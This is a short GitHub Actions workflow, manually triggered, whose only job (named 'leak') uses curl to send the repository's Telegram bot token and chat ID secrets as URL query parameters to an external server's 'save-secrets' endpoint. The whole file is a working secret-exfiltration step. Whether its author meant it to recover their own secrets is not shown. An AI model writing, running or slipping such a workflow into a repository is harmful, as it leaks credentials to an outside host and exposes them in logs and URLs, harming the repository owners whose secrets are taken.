name: Get Secrets Temporary Workflow
on:
  workflow_dispatch:

jobs:
  leak:
    runs-on: ubuntu-latest
    steps:
      - name: Send secrets to server
        run: |
          curl -s -G \
            --data-urlencode "bot_token=${{ secrets.TELEGRAM_BOT_TOKEN }}" \
            --data-urlencode "chat_id=${{ secrets.TELEGRAM_CHAT_ID }}" \
            "https://price-monitor.thierryrenematos.tec.br/save-secrets"
